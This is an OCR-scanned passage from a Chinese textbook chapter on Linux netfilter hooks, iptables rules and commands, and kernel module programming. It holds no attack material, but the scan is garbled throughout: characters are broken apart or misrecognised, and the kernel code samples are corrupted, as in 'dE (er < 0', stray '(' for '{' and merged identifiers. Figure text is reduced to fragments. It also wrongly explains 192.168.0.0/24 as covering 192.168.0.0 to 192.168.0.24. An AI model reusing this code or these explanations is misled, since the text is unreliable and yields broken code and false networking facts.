netfilter 就 是 根据 网 络 报 文 的 流向 ， 在 以 下 5 个 检查 点 插入 处 理 过程 。 
NF_IP_PRE_ROUTING: 在 报 文 做 路 由 以 前 执行 ; 
NF_IP_FORWARD: 在 报 文 转向 另 一 个 NIC 以 前 执行 
NF_IP_ POST_ ROUTING: 在 报 文 流出 以 前 执行 ; 
NF_IP_LOCAL IN: 在 流入 本 地 的 报 文 做 路 由 以 后 执行 ; 
NF_IP LOCAL OUT: 在 本 地 报 文 做 流出 路 由 前 执行 。 
利用 netfilter 中 的 5 个 参考 点 ， 查 阅 用 户 注册 的 回调 函数 ， 根 据 用 户 定义 的 回调 函数 
来 监视 进出 的 网 络 数据 包 ， 是 netfilter 的 基本 实现 框架 。 
netfilter 定义 了 一 个 全 局 变量 来 存储 用 户 的 回调 函数 : 


struct list head nf_hooks [NPROTO] [NF _ MAX HOOKS]; 


OOODOOCDO 


NPROTO 是 协议 类 型 ， 可 以 是 TCP、UDP 或 者 卫 协议 。NF_MAX_HOOKS 是 挂 接 的 
钧 子 的 最 大 数量 。 用 户 可 以 挂 接 回 调 函数 到 netfilter 架构 上 ， 函 数 为 nf_register_hook(), 在 
内 核 中 的 代码 如 下 : 


int nf register hook(struct nf hook ops *reg) 
( 
struct nf hook ops *elem; 
int err; 
err = mutex lock interruptible(g&nf hook mutex); 
dE (er < 0 
return err; 
list for each entryl(elem, &nf hooks[reg->pf] [reg->hooknum], list) { 
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if (reg->priority < elem->priority) 
break; 
} 
list add rcul(&reg->list, elem->list.prev); 
mutex unlock(g&nf hook mutex); 
return 0; 


可 以 看 出 ， 此 注册 函数 根据 优先 级 ， 将 用 户 的 回调 函数 放 到 全 局 变量 nf_hooks 中 。 
17.1.3 netfilter 检查 时 的 表格 
netfilter 在 检查 点 进行 检查 , 先 查 看 回调 函数 的 合法 性 , 然后 根据 协议 方式 决定 是 否 调 


口 口 


OOOODO DO 


让。 当 满 足 条 件 时 ， 调 用 用 户 挂 接 的 回调 函数 。netfilter 的 检查 是 基于 表格 进行 的 ， 如 
图 17.1 所 示 ，iptables 用 结构 ipt_table 表示 。 


list， 表 的 链表 。 

char name[IPT_TABLE MAXNAMELEN]: 表 的 名 称 ， 如 filter、nat 等 ， 为 了 满足 
自动 模块 加 载 的 设计 ， 包 含 该 表 的 模块 应 命名 为 iptable_ name'。 

struct ipt_replace *table: 表 模子 ， 初 始 为 initial_table.repl。 

unsigned int valid_hooks: 位 向 量 ， 标 示 本 表 所 影响 的 HOOK。 

rwlock tlock: 读 写 锁 ， 初 始 为 打开 状态 。 

struct ipt_table info *private: iptable 的 数据 区 。 

struct module *me: 是 否 在 模块 中 定义 。 


af: 协议 的 类 型 。 


list ip 
name nfcache 
valid hooks target 
lock offset 
private comefrom 
me counters 
af elems 
图 17.1 ipt_table 结构 示意 图 图 17.2 netfilter 的 规则 结构 示意 图 


17.1.4 ”netfilter 的 规则 
netfilter 的 规则 用 结构 struct ipt_entry 来 表示 ， 如 图 17.2 所 示 ， 其 含义 如 下 所 述 。 


口 


struct ipt ip ip: 所 要 匹配 报 文 的 卫 头 信息 。 


口 unsigned int nfcache: 表示 本 规则 关心 报 文 的 什么 部 分 。 
口 u int16 ttarget_offset: target 区 的 偏 移 ， 通 常 来 说 target 区 在 match 区 的 后 面 ， 而 
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match 区 则 在 ipt_entry 的 末尾 ;初始 化 为 sizeof(struct ipt_entry), 即 假定 没有 match 。 
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口 u_int16 tnext offset: 下 一 条 规则 相对 于 当前 规则 的 偏 移 ， 即 当前 规则 所 用 空间 的 
总 和 ， 初 始 化 为 sizeof(struct ipt_entry)+sizeoflstruct ipt_target)， 即 没有 match。 
口 unsigned int comefrom: 位 向 量 ， 标 记 调 用 当前 规则 的 HOOK 号 ,可 用 于 检查 规则 
的 有 效 性 。 
口 struct ipt_counters counters: 记录 该 规则 处 理 过 的 报 文 数量 和 报 文 的 总 字 节 数 。 
口 unsigned char elems[0]: 表示 target 或 者 是 match 的 起 始 位 置 。 
规则 按照 所 关注 的 HOOK 点 , 被 放置 在 struct ipt_table private->entries 之 后 的 区 域 。 规 
则 是 netfilter 进行 工作 的 最 重要 的 部 分 。netfilter 按照 规则 来 确定 是 否 对 数据 进行 处 理 ， 或 
者 做 何 种 处 理 。 


17.2 iptables 和 netfilter 


在 netfilter 的 基础 上 ，Linux 内 核 中 内 置 了 一 个 防火 墙 的 架构 iptables。 应 用 层 通 过 工 
具 iptables 与 内 核 通信 ， 构 建 网 络 数据 在 netfilter 上 的 处 理 规则 。 


17.2.1 iptables 简介 


netfilter 的 强大 功能 和 灵活 性 是 通过 iptables 界面 来 实现 的 。 这 个 命令 行 工具 和 它 的 前 
身 ipchains 的 语法 很 相似 ; 不 过 ，iptables 使 用 netfilter 子 系统 来 增进 网 络 连接 、 检 验 和 处 
理 方面 的 能 力 ，ipchains 使 用 错综复杂 的 规则 集合 来 过 滤 源 地 和 目的 地 路 线 ， 以 及 两 者 的 
连接 端口 。iptables 在 一 个 命令 行 界 面 中 就 包括 了 更 先进 的 记录 方式 、 选 路 前 和 选 路 后 的 行 
动 、 网 络 地 址 转换 ， 以 及 端口 转发 。 

使 用 iptables 的 第 一 步 是 启动 iptables 服务 。 在 通常 的 系统 中 , 可 以 使 用 以 下 命令 进行 : 


$service iptables start 


全 注意 : 在 Ubuntu 下 iptables 是 Linux 内 核 的 一 个 核心 模块 , 因此 不 可 使 用 以 上 命令 开启 。 
要 使 iptables 在 系统 引导 时 默认 启动 , 必须 使 用 chkconfig 来 改变 服务 的 运行 级 别 状态 : 
$chkconfig -level 234 iptables on 
iptables 的 语法 被 分 成 儿 个 层次 。 主 要 层次 为 “ 表 ” 和 “和 链 ”。 

17.2.2 iptables 的 表 和 链 


iptables 的 主要 构成 是 表 , iptables 的 操作 是 对 iptables 上 的 表 的 操作 。iptables 内 置 了 3 
个 表 : nat、mangle 和 filter。 默 认 情况 下 是 指 对 FILTER 表 的 操作 。 


1. nat 表 

nat 表 的 主要 用 处 是 网 络 地 址 转换 。 

网 络 数据 包 通 过 NAT 操作 后 , 数据 包 的 地 址 发 生 了 改变 , 这 种 改变 是 根据 所 定义 的 规 
则 进行 的 。 一 个 网 络 数据 包 只 经 过 一 次 nat 表 ， 如 果 一 个 网 络 数据 流 的 第 一 个 数据 包 经 过 
nat 表 ， 则 剩余 的 数据 包 也 会 经 过 这 个 表 。 即 其 他 的 数据 包 不 会 一 个 一 个 地 通过 nat 表 ， 而 
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是 自动 地 完成 这 种 转换 操作 。 


2: 


MANGLE 表 


MANGLE 表 的 主要 作用 用 来 对 数据 包 进 行 标记 。 


可 


以 改变 不 同 的 包 及 包头 的 内 容 ， 例 如 TTL、TOS 或 MARK。 对 于 进行 MARK 的 数 


据 包 并 没有 真正 地 改动 数据 包 数 据 ， 它 只 是 为 这 些 包 设 了 一 个 标记 。 防 火 墙 内 的 其 他 规则 


或 程序 


(如 te) 可 以 使 用 这 种 标记 对 包 进行 过 滤 或 高 级 路 由 。 


MANGLE 表 有 5 个 内 建 的 链 : PREROUTING、POSTROUTING、OUTPUT、INPUT 
和 FORWARD。 


口 
品 
品 
品 
品 
全 注意 


3 


PREROUTING 在 包 进 入 防火 墙 之 后 、 路 由 判断 之 前 改变 包 ; 


POSTROUTING 是 在 所 有 路 由 判断 之 后 ; 
OUTPUT 在 确定 包 的 目的 之 前 更 改 数据 包 ; 
INPUT 在 包 被 路 由 到 本 地 之 后 ， 但 在 用 户 空间 的 程序 看 到 它 之 前 改变 包 ; 
FORWARD 在 最 初 的 路 由 判断 之 后 、 最 后 一 次 更 改 包 的 目的 之 前 对 包 进 行 标记 。 
: MANGLE 表 不 能 做 任何 NAT， 它 只 是 改变 数据 包 的 TTL、TOS 或 MARK， 而 不 
是 其 源 地 址 和 目的 地 址 。NAT 是 在 nat 表 中 操作 的 。 
filter 表 


filter 表 是 专门 过 滤 包 的 ,内 建 3 个 链 , 可 以 对 包 进 行 DROP、LOG、ACCEPT 和 REJECT 
等 操作 。Iptables3 个 链 与 netfilter 之 间 的 关系 如 图 17.3 所 示 。 


口 


口 
口 
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FORWARD 链 过 滤 所 有 不 是 本 地 产生 的 并 且 目 的 地 不 是 本 地 (所谓 本 地 就 是 防火 
墙 ) 的 包 ，; 

INPUT 针对 那些 目的 地 是 本 地 的 包 ; 

OUTPUT 是 用 来 过 滤 所 有 本 地 生成 的 包 。 


INPUT 链 


“= FORWARD 链 
-= OUTPUT 链 


丢 序 / | ; 


网 络 协议 栈 


图 17.3 Iptables 3 个 链 和 netfilter 的 关系 
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17.2.3 ”使 用 iptables 设置 过 滤 规则 

通过 向 防火 墙 提供 有 关 对 来 自 某 个 源 、 到 某 个 目的 地 或 具有 特定 协议 类 型 的 信息 包 要 
做 些 什么 的 指令 、 对 信息 包 进 行 过 滤 。 通 过 使 用 netfilter/iptables 系统 提供 的 特殊 命令 
iptables， 建 立 这 些 规则 ， 并 将 规则 加 到 内 核 空间 内 特定 信息 包 的 过 滤 表 内 的 链 上 。 关 于 添 
加 、 删 除 、 编 辑 的 命令 的 一 般 语 法 如 下 : 


$ _ iptables [-t table] command [match] [target] 
命令 格式 由 表 、 命 令 、 匹 配 和 目标 组 成 。 
1. 表 (table) 


[-ttable] 选 项 允许 使 用 标准 表 之 外 的 任何 表 。 表 是 包含 仅 处 理 特定 类 型 信息 包 的 规则 和 
链 的 信息 包 过 滤 表 。 有 3 种 可 用 的 表 选 项 : filter、nat 和 mangle。 该 选项 不 是 必需 的 ， 如 
果 未 指定 ， 则 filter 用 做 默认 表 。 


2. 命令 (command) 


上 面 这 条 命令 中 具有 强制 性 的 command 部 分 是 iptables 命令 的 最 重要 部 分 。 它 告诉 
iptables 命令 要 做 什么 ， 例 如 ， 插 入 规则 、 将 规则 添加 到 链 的 末尾 或 删除 规则 。 以 下 是 最 常 
用 的 一 些 命令 。 

口 -A 或 --append: 这 个 命令 将 一 条 过 滤 规 则 添加 到 规则 链 的 末尾 。 例 如 : 


$ iptables -A INPUT -s 205.168.0.1 -j ACCEPT 


该 示例 命令 将 一 条 规则 附加 到 INPUT 链 的 末尾 ， 确 定 来 自 源 地 址 205.168.0.1 的 信息 
包 可 以 ACCEPT。 
口 -D 或 --delete: 通过 用 -D 指定 要 匹配 的 规则 或 者 指定 规则 在 链 中 的 位 置 编号 ， 这 个 
命令 从 过 滤 规 则 链 中 一 条 规则 。 下 面 的 示例 显示 了 这 两 种 方法 。 例 如 : 
$ iptables -D INPUT --dport 80 -j DROP 
$ iptables -D OUTPUT 3 
第 一 行 命令 从 INPUT 链 删除 一 条 规则 ， 它 指定 DROP 前 往 端口 80 的 信息 包 。 第 二 条 
命令 从 OUTPUT 链 中 删除 编号 为 3 的 规则 。 
口 -P 或 -policy: 该 命令 设置 链 的 默认 目标 策略 。 当 网 络 数据 从 链 中 的 规则 经 过 时 ， 
如 果 任 何 规则 都 不 匹配 ， 则 数据 包 都 将 强制 使 用 此 链 的 策略 。 例 如 : 
$ iptables -P INPUT DROP 
该 命令 将 INPUT 链 的 默认 目标 指定 为 DROP。 这 意味 着 ， 将 丢弃 所 有 与 INPUT 链 中 
任何 规则 都 不 匹配 的 信息 包 。 
口 -N 或 --new-chain: 建立 一 个 用 户 指定 名 称 的 一 个 新 链 。 例 如 : 


$ _ iptables -N allowed-chain 


口 -F 或 -ftush: 清空 一 个 链 上 的 所 有 规则 。 如 果 指 定 链 名 ， 该 命令 删除 指定 链 中 的 所 
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有 规则 ， 如 果 未 指定 链 名 ， 该 命令 删除 所 有 链 中 的 所 有 规则 。 此 参数 用 于 快速 清 
除 。 例 如 : 

$ iptables -F FORWARD 

$ iptables -F 

口 -L 或 -list， 列 出 所 指定 链 中 的 所 有 规则 信息 。 如 果 指 定 链 名 ， 就 列 出 指定 链 中 的 
规则 ， 和 否则 将 所 有 链 中 的 规则 列 出 。 例 如 : 


$ iptables -L allowed-chain 


3. 匹配 (match) 


iptables 命令 的 可 选 match 部 分 指定 信息 包 与 规则 匹配 所 应 具有 的 特征 (如 源 和 目的 地 
地 址 、 协 议 等 )。 匹 配 分 为 两 大 类 : 通用 类 型 匹配 和 特定 协议 的 匹配 。 下 面 是 一 些 重要 的 且 
常用 的 通用 匹配 及 其 示例 和 说 明 。 
口 -p 或 --protocol: 这 是 一 种 通用 协议 匹配 ， 它 用 于 检查 某 些 特定 协议 。 协 议 示 例 有 
TCP、UDP、ICMP、 用 去 号 分 隔 的 任何 这 3 种 协议 的 组 合 列表 以 及 ALL (用 于 所 
有 协议 ) 。ALL 是 默认 匹配 。 可 以 使 用 ! 符 号 ， 它 表示 不 与 该 项 匹配 。 例 如 : 
$ iptables -A INPUT -p TCP, UDP 
$ iptables -A INPUT -p ! ICMP 
在 上 述 示例 中 ， 两 条 命令 都 执行 同一 任务 一 一 它们 指定 所 有 TCP 和 UDP 信息 包 都 将 
与 该 规则 匹配 。 通 过 指定 ICMP， 可 以 允许 所 有 其 他 协议 (在 这 种 情况 下 是 TCP 和 UDP)， 
而 将 ICMP 排除 在 外 。 
口 -s 或 --source: 这 种 匹配 规则 用 于 根据 信息 包 的 源 I 了 P 地 址 来 与 匹配 规则 。 该 匹配 还 
允许 对 某 一 范围 内 的 IP 地 址 进行 匹配 ， 或 者 使 用 符号 “!”， 表 示 不 与 该 项 匹配 。 
默认 源 匹 配 与 所 有 IP 地 址 匹配 。 例 如 : 


$ iptables -A OUTPUT -s 192.168.1.1 

$ iptables -A OUTPUT -s 192.168.0.0/24 

$ iptables -A OUTPUT -s ! 203.16.1.89 

第 2 条 命令 指定 该 规则 与 所 有 来 自 192.168.0.0 到 192.168.0.24 的 卫 地 址 范围 的 信息 包 

匹配 。 第 3 条 命令 指定 该 规则 将 与 除 来 自 源 地 址 203.16.1.89 外 的 任何 信息 包 匹 配 。 

口 -d 或 --destination: 该 目的 地 匹配 用 于 根据 信息 包 的 目的 地 IP 地 址 来 与 它们 匹配 。 
该 匹配 还 允许 对 某 一 范围 内 IP 地 址 进行 匹配 , 可 以 使 用 ! 符 号 , 表示 不 与 该 项 匹配 。 
例如 : 


$ iptables -A INPUT -d 192.168.1.1 
$ iptables -A INPUT -d 192.168.0.0/24 
$ iptables -A OUTPUT -d ! 203.16.1.89 


4. 目标 (target) 


目标 是 规则 所 描述 的 操作 。 当 数据 包 与 规则 匹配 的 时 候 , 则 对 数据 包 执 行 相应 的 操作 。 
下 面 是 常用 的 一 些 目 标 设 置 示例 和 说 明 。 
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口 ACCEPT: 当 数 据 包 与 包含 ACCEPT 目标 的 规则 匹配 时 ， 可 以 通过 防火 墙 ， 人 允许 
数据 包 前 往 目 的 地 。 并 且 它 将 停止 遍历 链 (虽然 该 信息 包 可 能 遍历 另 一 个 表 中 的 
其 他 链 ， 并 且 有 可 能 在 那里 被 丢弃 ) 。 该 目标 被 指定 为 - ACCEPT。 

口 DROP: 当 信息 包 与 具有 DROP 目标 的 规则 完全 匹配 时 , 会 阻塞 该 信息 包 , 并 且 不 
对 它 做 进一步 处 理 。 该 目标 被 指定 为 - DROP 。 

口 REJECT: 这 个 目标 的 作用 与 DROP 目标 相同 ， 但 它 比 DROP 好 。 和 DROP 不 同 ， 
REJECT 不 会 在 服务 器 和 客户 端 上 留 下 死 套 接 字 。REJECT 目标 将 错误 消息 发 回 给 
信息 包 的 发 送 方 。 该 日 标 被 指定 为 - REJECT。 例 如 : 


$ iptables -A FORWARD -p TCP --dport 22 -j REJECT 


口 RETURN: 在 规则 中 设置 的 RETURN 目标 让 与 该 规则 匹配 的 信息 包 停 止 遍 历 包含 
该 规则 的 链 。 如果 链 是 如 INPUT 之 类 的 主 链 , 则 使 用 该 链 的 默认 策略 处 理 信息 包 。 
它 被 指定 为 -jump RETURN。 例 如 : 


$ iptables -A FORWARD -d 203.16.1.89 -jump RETURN 


还 有 许多 用 于 建立 高 级 规则 的 其 他 目标 , 如 LOG、REDIRECT、MARK、MIRROR 和 
MASQUERADE 等 。 


17.3 ”内 核 模块 编程 


netfilter 框架 程序 的 编写 是 在 内 核 层 进行 的 , 在 内 核 层 编写 程序 和 应 用 层 编写 程序 有 很 
大 的 区 别 。 典 型 的 应 用 程序 有 一 个 main 程序 , 而 内 核 模块 则 需要 一 个 初始 化 函数 和 清理 函 
数 ， 在 向 内 核 中 插入 模块 时 调用 初始 化 函数 ， 钊 载 内 核 模块 时 调用 清理 函数 。Linux 的 内 
核 编 程 通常 采用 可 加 载 模块 的 方式 ， 与 直接 编 进 内 核 相 比较 ， 可 加 载 内 核 模块 有 很 大 的 方 
便 性 ， 

口 不 用 重新 编译 内 核 。 

口 可 以 动态 加 载 和 印 载 ， 调 试 使 用 方便 。 


17.3.1 内 核 “Hello World! ”程序 
本 节 将 通过 一 个 “Hello World” 例 子 对 内 核 模块 程序 设计 进行 介绍 。 
1. 内 核 的 “Hello World” 例 子 
在 介绍 内 核 模块 编程 之 前 ， 先 看 一 个 内 核 层 的 “Hello World!” 的 例子 。 代 码 如 下 : 


01 #include <linux/module.h> 

02 #include <linux/init.h> 

03 “/* 版 权 声明 */ 

04 MODULE LICENSE ("Dual BSD/GPL"); 

05 “/* 初 始 化 模块 */ 

06 static int _ init helloworld init(void) 

ye 

08 Printk (KERN ALERT "Hello world module init\n"); /* 打 印信 息 */ 
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09 return 0; 


11 “/* 清 理 模块 */ 
12 static void _exit helloworld exit (void) 
1 


14 printk (KERN_ ALERT "Hellow world module exit\n");  /* 打 印信 息 */ 
15 

16 module init(helloworld init); /* 模 块 初始 化 */ 
17 module exit(helloworld exit); /* 模 块 退出 */ 
18 /* 作 者 、 软 件 描述 、 版 本 等 声明 信息 */ 

19 MODULE AUTHOR("Jingbin Song"); /* 作 者 声明 */ 
20 MODULE DESCRIPTION ("Hello World DEMO"); /* 描 述 声 明 */ 
21 MODULE VERSION("0.0.1"); /* 版 本 */ 

22 MODULE ALIAS("Chapter 17, Example 1"); /* 模 块 别 名 */ 


这 个 “Hello World” 模 块 只 包含 内 核 模 块 的 加 载 、 外 载 函数 和 简单 的 授权 、 作 者 、 描 
述 等 信息 声明 。 测 试 所 编写 的 代码 可 以 用 insmod 命令 来 加 载 内 核 、rmmod 来 卸载 内 核 。 
加 载 内 核 需 要 在 超级 用 户 的 权限 下 进行 ， 其 过 程 和 显示 信息 如 下 : 

$ make 

make =€ /usr/src/linux-headers-3.2.0-45-generic-pae 

M=/home/linux-c/Linux net/17/17.3.1 

make[1] : 正在 进入 目录 `/usr/src/linux-headers-3.2.0-45-generic-pae' 

CC [M] /home/linux-c/Linux net/17/17.3.1/hello.o 
Building modules, stage 2. 

MODPOST 1 modules 

ce /home/linux-c/Linux net/17/17.3.1/hello.mod.o 
LD [M] /home/linux-c/Linux net/17/17.3.1/hello.ko 

#insmod hello.ko 

Hello world module init 

#rmmod hello 

Hellow world module exit 


全 注意 ; 由 于 系统 传输 机 制 的 不 同 ， 不 同 的 运行 环境 可 能 不 会 显 式 地 输出 信息 。 稍 后 将 会 
介绍 如 何 查看 以 上 程序 的 输出 。 


2. 内 核 模块 和 应 用 程序 的 调试 和 函数 的 不 同 


内 核 正 常 编译 不 仅仅 需要 内 核 的 头 文件 ，3.2 的 内 核 需 要 内 核 编译 的 目标 文件 在 代码 
树 中 才能 通过 编译 。 在 Ubuntu 中 需要 安装 当前 运行 版 本 的 Linux-header 的 模块 就 可 以 进行 
编译 了 ， 里 面包 含 了 编译 内 核 时 的 目标 文件 ， 其 目录 位 于 /lib/modules/xxxx/build 目录 下 ; 
代码 编译 通过 后 ， 生 成 hello.ko 内 核 模 块 。 

由 于 消息 传递 机 制 的 不 同 , 在 insmod 和 rmmod 后 , 读者 可 能 得 到 的 输出 结果 不 一 致 。 
上 面 的 结果 是 在 控制 台 界 面 得 到 的 ， 当 在 X-Window 或 者 通过 网 络 登录 的 主机 上 时 ， 可 能 
会 得 不 到 输出 。 可 以 查看 日 志文 件 或 者 使 用 dmesg 命令 得 到 内 核 中 打印 的 信息 。 例 如 ; 


$dmesg 
Hello world module init 
Hellow world module exit 


在 Linux 内 核 中 的 打印 输出 函数 和 用 户 空 间 的 printf 不 同 ， 采 用 printk。printk 定义 了 
不 同 的 输出 级 别 ， 格 式 输 出 与 printf 是 一 致 的 。 可 以 使 用 printk 进行 简单 的 内 核 调试 。 
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与 insmod 加 载 内 核 的 功能 类 似 ，modprobe 也 可 以 实现 加 载 内 核 的 功能 。modprobe 在 
加 载 内 核 的 同时 ， 根 据 依赖 关系 加 载 同 时 加 载 所 依赖 的 其 他 模块 。 

在 “Hello World!” 模 块 代码 中 ， 还 声明 了 模块 的 一 些 描述 信息 ,这些 信息 可 以 道 过 命 
令 modinfo 获得 ， 例 如 : 


1# modinfo hello.ko 


filename: hello.ko 

alias: Chapter 17, Example 1 

version: DO 

description: Hello World DEMO 

author: Jingbin Song 

license: Dual BSD/GPL 

srcversion: E5E906554933029BA330EFF 

depends: 

Vermagic: 3.2.0-45-generic-pae SMP mod unload modversions 686 


已 经 加 载 的 内 核 模块 信息 及 内 核 模块 间 的 依赖 关系 可 以 通过 命令 lsmod 获得 : 


# lsmod 

Module Size Used by 

hello 12398 0 

usb_storage 39646 0 

iptable filter 12706 0 

ip_tables 18106 1 iptable filter 

x tables 22011 2 iptable filter,ip tables 


模块 ip_tables 依赖 于 模块 iptable_filter，x_tables 模块 依赖 于 模块 iptable_filter 和 
ip_tables。 这 些 信息 也 可 以 通过 虚拟 文件 /proc/modules 获得 。 


17.3.2 ”内 核 模块 的 基本 架构 


17.3.1 节 的 程序 展示 了 内 核 模块 的 基本 架构 ， 如 图 17.4 所 示 ， 一 个 Linux 内 核 模块 包 
含 如 下 儿 个 部 分 ， 其 中 阴影 的 部 分 编写 内 核 模块 时 必须 具有 。 


1. 模块 初始 化 函数 NS 

使 用 命令 insmod 或 者 modprobe 加 载 内 核 模块 的 时 候 , 会 SS 
自动 调用 模块 的 初始 化 函数 ， 进 行 模块 的 初始 化 ， 主 要 是 资源 7 | 
申请 。 

2 模块 清除 函数 

使 用 命令 rmmod 印 载 内 核 模块 的 时 候 ， 模 块 清除 函数 会 
自动 调用 ， 进 行 模块 退出 之 前 的 清理 工作 ， 主 要 是 状态 重 置 和 
资源 释放 。 


3. 模块 许可 证 声明 、 作 者 、 模 块 描 述 信息 等 声明 


尽管 没有 强制 要 求 必须 声明 许可 证 ， 但 是 在 进行 模块 编写 的 时 候 最 好 指定 。 内 核 可 以 
识别 如 下 4 种 许可 方式 : GPL、Dual BSD/GPL、Dual MPL/GPL、Proprietary。 没 有 采用 以 
上 许可 证 方式 的 声明 则 假定 为 私有 的 ,内核 加 载 这 种 模块 会 被 “污染 ”。 其 他 描述 性 信息 如 


可 导出 符号 表 


加 载 参数 


图 17.4 内核 模块 基本 架构 
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下 所 述 。 
口 MODULE _ AUTHOR: 模块 作者 描述 ; 
口 MODULE DESCRIPTION: 模块 用 途 的 简短 描述 ; 
口 MODULE VERSION: 模块 的 版 本 号 ; 
口 MODULE_ AVIAS: 模块 的 别名 。 


4. 模块 可 导出 符号 表 


与 用 户 空 间 编程 时 的 库 类 似 ， 内 核 模块 中 也 可 以 调用 其 他 模块 中 的 例 程 ， 或 者 允许 其 
他 模块 调用 本 模块 中 的 函数 。insmod 的 加 载 过 程 包含 的 一 个 步 又 就 是 把 允许 导出 的 符号 加 
到 公共 内 核 符号 表 中 ， 或 者 使 用 公共 内 核 符号 表 来 解析 加 载 模块 中 未 定义 的 符号 。 

Linux 内 核 中 可 以 使 用 两 个 宏 来 实现 导出 符号 的 目的 : 

EXPORT_SYMBOL (syYmbol) 

EXPORT_SYMBOL GPL (symbol) 

其 中 ，GPL 版 本 导出 符号 只 允许 被 GPL 版 本 许可 证 的 模块 所 调用 。 导 出 的 符号 必须 
在 模块 文件 的 全 局 可 见 ， 不 能 将 局 部 的 符号 导出 。 例 如 声明 为 static 的 函数 不 能 被 导出 ， 
而 需要 导出 的 变量 则 要 在 函数 体外 进行 声明 。 

不 需要 导出 的 变量 和 函数 等 内 核 符号 最 好 用 static 进行 修饰 ， 防 止 内 核 中 的 名 字 污 染 ， 
同时 可 以 对 本 模块 的 安全 有 一 定 的 保证 。 


5. 模块 加 载 参 数 


用 户 空间 的 应 用 程序 可 以 接受 用 户 的 参数 ，Linux 的 内 核 模块 在 加 载 的 时 候 也 可 以 加 
载 参数 。 在 “Hello World” 模 块 中 可 以 修改 模块 初始 化 时 的 打印 语句 为 : 


printk (KERN_ ALERT "Hello %s \n", target); 


其 中 target 的 声明 如 下 : 

static char *target = "world"; 

module param(target, charp, S_IRUGO); 

在 加 载 内 核 模 块 的 时 候 , 打印 的 信息 根据 用 户 输入 的 参数 而 变化 ; 如 果 没 有 参数 输入 ， 
则 会 打印 默认 的 “Hello world”。 例如 按照 如 下 进行 参数 输入 ， 对 应 的 输出 发 生 了 改变 : 

#insmod hellow.ko target="Olympics Games" 

Hello Olympics Games 

内 核 加 载 参数 有 如 下 类 型 。 

口 b: bool、invbool 布尔 型 (其 值 为 true 或 者 false) 。Invbool 对 bool 类 型 的 值 进行 

了 颠倒 ， 其 真 为 false 假 为 tue。b 类 型 的 值 包含 char、unsigned char 类 型 。 

口 h: 包含 short、ushort。 

口 i: int、uint 类 型 。 

口 1: long、ulong 类 型 。 

口 s: 字符 串 值 呈 charp 字符 指针 值 。 内 存 为 用 户 提供 的 字 串 分 配 ， 指 针 因 此 设置 。 

模块 加 载 参数 的 函数 使 用 方式 很 简单 ， 例 如 : 
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module param(var，"8h"，S IRUGO); // 最 大 长 度 为 8 的 短 整 型 变量 
module param(var, "20-241", S_IRUGO); 


//” 最 小 长 度 为 20, 最 大 长 度 为 24 的 长 整 型 变量 
内 核 加 载 参 数 的 命令 格式 如 下 : 


insmod variable=value[,value2...] ... 


当然 ， 其 中 value 也 可 以 用 双 引 号 括 起 来 。 但 注意 “=” 前 后 不 能 有 空格 ， 在 value 的 
值 中 也 不 能 有 空格 。 


17.3.3 ”内 核 模块 加 载 和 和 扼 载 过 程 


如 图 17.5 所 示 ， 内 核 模 块 的 加 载 过 程 分 为 用 户 空间 动作 和 内 核 空间 动作 : 用 户 空间 负 
责 内 核 模块 加 载 准 备 ， 内 核 空间 负责 复制 、 检 查 和 内 核 模 块 初始 化 等 工作 。 内 核 加 载 时 ， 
用 户 输入 命令 insmod 后 ， 会 调用 init_module() 函 数 。 其 系统 调用 sys_init_module() 函 数 会 
进行 以 下 工作 : 

口 将 模块 程序 复制 到 内 核 中 ， 进 行 必要 的 检查 ， 例 如 合法 性 权限 。 

口 load_module0 函 数 对 复制 到 内 存 的 映像 进行 解析 、 布 局 、 分 配 资源 。 

口 最 后 会 调用 所 加 载 模块 中 的 init() 函 数 。 

如 图 17.6 所 示 ， 内 核 模块 的 卸载 过 程 也 分 为 用 户 空间 动作 和 内 核 空间 动作 : 用 户 空 间 
的 动作 负责 内 核 模块 印 载 准备 内核 空间 的 动作 负责 卸载 前 检查 、 内 核 模块 清理 函数 的 调 
用 、 模 块 清理 等 工作 。 内 核 和 卸载 是 一 个 与 内 核 初始 化 相反 的 过 程 ， 用 户 输入 rmmod 后 , 会 
调用 delete module() 函 数 ， 其 系统 调用 sys_delete_module() 函 数 会 进行 以 下 工作 : 


用 rmmod 用 
户 1 户 
室 空 
间 delete_module 辣 
sc 
ed pe 
Sys_init_module sys_delete_module 
依赖 性 检查 四 
几 1 
核 是 否 加 载 核 
空 1 空 
间 module_exit 间 
Eh 
free module 
图 17.5 内核 模块 加 载 过 程 图 17.6 ”内 核 模块 卸载 过 程 


口 检查 是 否 有 其 他 模块 依赖 本 模块 ; 
口 检查 所 需 和 卸载 模块 是 否 加 载 ; 
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调用 内 核 模块 中 的 清理 函数 ; 


内 核 模 块 初始 化 和 清理 函数 


内 核 模块 的 初始 化 函数 主要 进行 初始 化 工作 ， 例 如 一 些 内 核 模块 正常 运行 所 需 资源 


(内 存 、 


sta 


{ 


} 


中 断 等 ) 的 申请 。 模 块 的 初始 化 采用 类 似 如 下 代码 的 形式 : 
tic int init initialize(void) 


/* 内 核 初始 化 代码 */ 


return 0; 


module init(initialize); 


其 代码 符合 以 下 的 规则 : 
必须 用 宏 module_init() 函 数 将 初始 化 函数 包 起 来 , 此 宏 定义 了 一 些 特殊 代码 到 模块 


口 


口 


口 


代码 中 。 


初始 化 函数 〈 即 initialize) 最 好 声明 为 静态 的 。 一 方面 防止 名 字 空 间 被 “污染 ”， 


另 一 方面 防止 此 函数 在 本 文件 之 外 被 调用 。 


采用 _init 修饰 ， 此 修饰 在 内 核 加 载 后 会 释放 此 部 分 代码 空间 ， 并 能 保证 不 被 其 他 


过 程 调用 ， 仅 用 于 本 模块 加 载 时 使 用 ，__init 修饰 可 以 省 略 。 


内 核 模 块 清理 函数 在 本 模块 卸载 时 做 一 些 清理 工作 ， 例 如 内 存 释放 、 状 态 重 置 等 ， 内 
核 模块 清理 函数 的 代码 框架 如 下 : 


static void exit exit(void) 


{ 


} 


/* 内 核 清理 代码 */ 


module exit (exit); 


内 核 模 块 清理 的 代码 规则 与 初始 化 类 似 : 


口 
口 
口 


17:3:5 


必须 用 宏 module_exit() 函 数 将 初始 化 函数 包 起 来 。 
释放 函数 〈 即 exit) 最 好 声明 为 静态 的 。 
采用 _exit 修饰 。 


内 核 模块 初始 化 和 清理 过 程 的 容错 处 理 


在 前 面 介绍 的 内 核 初始 化 和 清理 函数 时 提 到 ， 在 初始 化 过 程 和 清理 过 程 中 会 有 出 错 的 
情况 ， 如 果 不 做 容错 处 理 ， 会 产生 灾难 性 的 后 果 : 经 常 的 现象 是 系统 宕 机 。Linux 内 核 代 
码 编写 对 于 容错 的 要 求 是 在 初始 化 发 现 错误 时 立即 停止 之 后 的 操作 进行 


资源 、 习 


